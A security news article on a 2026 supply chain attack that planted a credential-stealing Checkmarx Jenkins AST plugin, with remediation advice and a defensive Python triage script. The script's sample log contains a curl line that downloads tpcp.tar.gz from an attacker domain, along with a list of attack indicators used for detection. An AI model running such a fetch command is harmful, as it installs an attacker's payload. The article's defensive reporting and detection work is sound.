Critical Checkmarx Plugin Vulnerability Exposed Jenkins AST Users
Key Takeaways
- A malicious version of the Checkmarx Jenkins AST plugin (version 2026.5.09) was distributed via the Jenkins Marketplace, exposing CI/CD pipelines to credential theft.
- This incident is part of a broader supply chain attack by the threat actor TeamPCP, originating from a compromise of the Trivy scanner and Checkmarx’s GitHub repositories.
- The attack aimed to exfiltrate sensitive credentials and secrets, including GitHub tokens, cloud credentials (AWS, Azure, Google Cloud), Kubernetes tokens, SSH keys, and Docker registry credentials.
- Organizations that downloaded and used the malicious plugin between May 9, 2026, 01:25 UTC, and May 10, 2026, 08:47 UTC, are at risk.
- Checkmarx has removed the compromised plugin and is working on a clean replacement. Immediate mitigation steps, including credential rotation and network blocking, are strongly advised.
A recent, sophisticated supply chain attack has targeted Checkmarx, a widely used application security vendor, through its Jenkins AST plugin. In May 2026, a malicious iteration of the plugin, version 2026.5.09, was covertly published to the Jenkins Marketplace. This compromise exposed development pipelines to credential theft and unauthorized access, as detailed in Checkmarx's incident report.
The incident has been linked to the threat actor known as TeamPCP. Their earlier compromise of the open-source Trivy scanner initiated a cascading series of events with far-reaching implications across the software development ecosystem.
The Chronology of a Supply Chain Breach
The attack unfolded over several weeks, beginning on March 23, 2026. Attackers successfully injected malicious code directly into Checkmarx’s GitHub repository. This initial breach is believed to stem from credentials acquired during TeamPCP’s earlier supply chain compromise of the Trivy scanner, an incident the security community had identified on March 19 as a potential vector for harvesting credentials from downstream users and their connected systems. Analysts at Checkmarx have since traced the likely attack path back to this initial Trivy compromise, concluding that the stolen credentials facilitated unauthorized access to their GitHub environment. Once inside, the attackers manipulated internal repositories, embedding malicious code into critical artifacts distributed to developers globally.
The Jenkins Plugin Compromise
The campaign rapidly escalated into a multi-stage operation. A second wave of malicious artifacts appeared on April 22, 2026, suggesting that the attackers either maintained or regained access despite initial containment efforts. Subsequently, on April 25, the cybercriminal group LAPSUS$ publicized data stolen from Checkmarx’s GitHub repositories on the dark web, nearly a month after the suspected data exfiltration on March 30.
The full extent of the compromise became apparent in May when the tampered Jenkins AST plugin, version 2026.5.09, was uploaded to the Jenkins Marketplace. This provided the attackers with a new and dangerous foothold within CI/CD pipelines worldwide. The malicious plugin was engineered to mimic legitimate functionality, making detection challenging for development teams during routine pipeline executions. The exposure window for this specific plugin extended from May 9, 2026, at 01:25 UTC, to May 10, 2026, at 08:47 UTC.
Any organization that downloaded and integrated this specific plugin version into an active build pipeline during the aforementioned period may have been compromised. Checkmarx confirmed that the last known secure version was 2.0.13-829.vc72453fa_1c16, released in December 2025. Teams operating this version or any prior release are not considered affected by this particular phase of the attack. Checkmarx has acted swiftly to remove the malicious plugin and is in the process of releasing a verified, clean replacement. Organizations relying on automated plugin updates face heightened risk, as the compromised version could have been silently integrated without any apparent changes to their build configurations.
KICS and the Broader Artifact Exposure
The April offensive simultaneously impacted a wider array of developer tools. The public KICS Docker image on DockerHub was compromised between April 22, 2026, 12:31 UTC, and 12:59 UTC. On the same day, the ast-github-action was tampered with between 14:17 and 15:41 UTC. Furthermore, malicious versions of the VS Code extensions for Checkmarx AST results and Developer Assist were distributed across both the Microsoft and Open VSX marketplaces.
The investigation revealed that the primary objective of the malicious code was the collection and attempted exfiltration of sensitive credentials and secrets from affected development environments. The targeted data included GitHub personal access tokens, cloud credentials for AWS, Azure, and Google Cloud, Kubernetes service account tokens, SSH keys, and Docker registry credentials.
What You Should Do
- Immediately block outbound access to checkmarx.cx and audit.checkmarx.cx at the network perimeter.
- Rotate all potentially exposed credentials, including GitHub personal access tokens, cloud credentials (AWS, Azure, Google Cloud), Kubernetes service account tokens, SSH keys, and Docker registry credentials.
- Pin all development tools and dependencies to verified SHA hashes to prevent silent updates to malicious versions.
- Disable automatic update features for all IDE extensions, especially those related to Checkmarx products.
- Review CI/CD logs for any references to suspicious files like tpcp.tar.gz, attacker-controlled domains such as checkmarx.zone, or unexpected repositories like tpcp-docs.
- Verify the integrity of all Checkmarx plugins and extensions against the last known safe version (2.0.13-829.vc72453fa_1c16 for the Jenkins AST plugin) or official, remediated releases.
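The following triage script is an added example for this article, not code from Checkmarx, Jenkins, or the article's author. It automates three of the checks above: it classifies an installed plugin version against the tampered 2026.5.09 build and the last known-safe 2.0.13-829.vc72453fa_1c16, tests whether an install time falls inside the published exposure window, greps pipeline logs for the indicators named in the article, and includes a SHA-256 pinning check. The plugin short name checkmarx-ast-scanner, the use of the Plugin-Version manifest header as the version source, the numeric-prefix version ordering, and all sample manifest and log data are assumptions constructed for the demo.

```python
"""Triage helper for the Checkmarx Jenkins AST plugin incident.

Added example; not code from Checkmarx, Jenkins, or the article. ASSUMPTIONS:
plugin short name checkmarx-ast-scanner, Plugin-Version header as the version
source, numeric-prefix version ordering, and all sample data below.
"""
import hashlib
import re
from datetime import datetime, timezone

MALICIOUS_VERSION = "2026.5.09"
LAST_SAFE_VERSION = "2.0.13-829.vc72453fa_1c16"
EXPOSURE_START = datetime(2026, 5, 9, 1, 25, tzinfo=timezone.utc)
EXPOSURE_END = datetime(2026, 5, 10, 8, 47, tzinfo=timezone.utc)

# Indicators named in the advisory text. Each is matched case-insensitively as
# a whole token so that checkmarx.cx does not match checkmarx.com; a bare
# domain also matches its subdomains (checkmarx.cx hits audit.checkmarx.cx).
IOCS = ("tpcp.tar.gz", "checkmarx.zone", "tpcp-docs", "checkmarx.cx", "audit.checkmarx.cx")
_IOC_RE = {ioc: re.compile(r"(?<![\w-])" + re.escape(ioc) + r"(?![\w-])", re.I) for ioc in IOCS}


def parse_manifest_version(manifest_text):
    """Return the Plugin-Version header from a Jenkins .jpi META-INF/MANIFEST.MF."""
    m = re.search(r"^Plugin-Version:\s*(\S+)", manifest_text, re.M)
    if not m:
        raise ValueError("no Plugin-Version header in manifest")
    return m.group(1)


def _numeric_key(version):
    # Assumption: comparing the numeric fields left to right approximates
    # Jenkins plugin version ordering well enough to separate prior releases
    # from newer ones (2.0.12 < 2.0.13-829... < 2.0.14 < 2026.5.09).
    return tuple(int(x) for x in re.findall(r"\d+", version))


def classify_version(version):
    """'malicious' for the tampered build, 'not_affected' for the last safe
    release or anything before it, 'verify' for any other (newer) version,
    which must be checked against Checkmarx's remediated release."""
    if version == MALICIOUS_VERSION:
        return "malicious"
    if version == LAST_SAFE_VERSION or _numeric_key(version) <= _numeric_key(LAST_SAFE_VERSION):
        return "not_affected"
    return "verify"


def in_exposure_window(installed_at_iso):
    """True if an ISO-8601 UTC timestamp (e.g. the .jpi file mtime) lies in the window."""
    ts = datetime.fromisoformat(installed_at_iso.replace("Z", "+00:00"))
    if ts.tzinfo is None:
        ts = ts.replace(tzinfo=timezone.utc)
    return EXPOSURE_START <= ts <= EXPOSURE_END


def scan_logs(lines):
    """Return one hit per (line number, indicator) found in the given log lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        for ioc, rx in _IOC_RE.items():
            if rx.search(line):
                hits.append({"line": n, "ioc": ioc, "text": line})
    return hits


def verify_sha256(data, expected_hex):
    """Pinning check: compare an artifact's SHA-256 with the hash you recorded for it."""
    return hashlib.sha256(data).hexdigest() == expected_hex.lower()


def triage(manifest_text, installed_at_iso, log_lines):
    version = parse_manifest_version(manifest_text)
    return {
        "version": version,
        "verdict": classify_version(version),
        "installed_in_window": in_exposure_window(installed_at_iso),
        "ioc_hits": scan_logs(log_lines),
    }


# Constructed sample input: a manifest for the tampered build, an install time
# inside the exposure window, and three pipeline log lines, two of which carry
# indicators from the advisory.
SAMPLE_MANIFEST = "Manifest-Version: 1.0\nShort-Name: checkmarx-ast-scanner\nPlugin-Version: 2026.5.09\n"
SAMPLE_INSTALLED_AT = "2026-05-09T03:12:00Z"
SAMPLE_LOG = [
    "[Pipeline] sh + curl -fsSL https://audit.checkmarx.cx/tpcp.tar.gz -o /tmp/tpcp.tar.gz",
    "[Pipeline] sh + git clone https://example.com/tpcp-docs",
    "[Pipeline] sh + cx scan create --project-name demo",
]

if __name__ == "__main__":
    report = triage(SAMPLE_MANIFEST, SAMPLE_INSTALLED_AT, SAMPLE_LOG)
    print(f"plugin {report['version']}: {report['verdict']}, installed in window: {report['installed_in_window']}")
    for h in report["ioc_hits"]:
        print(f"  line {h['line']}: {h['ioc']}")
```

On a real controller, installed plugins live under $JENKINS_HOME/plugins as .jpi archives; read META-INF/MANIFEST.MF out of the archive with the zipfile module and feed it to parse_manifest_version, and use the archive's mtime as the install-time input. A "verify" verdict is not a clean bill of health: it only means the version is newer than the last known-safe release and must be matched against the remediated build Checkmarx publishes.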
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.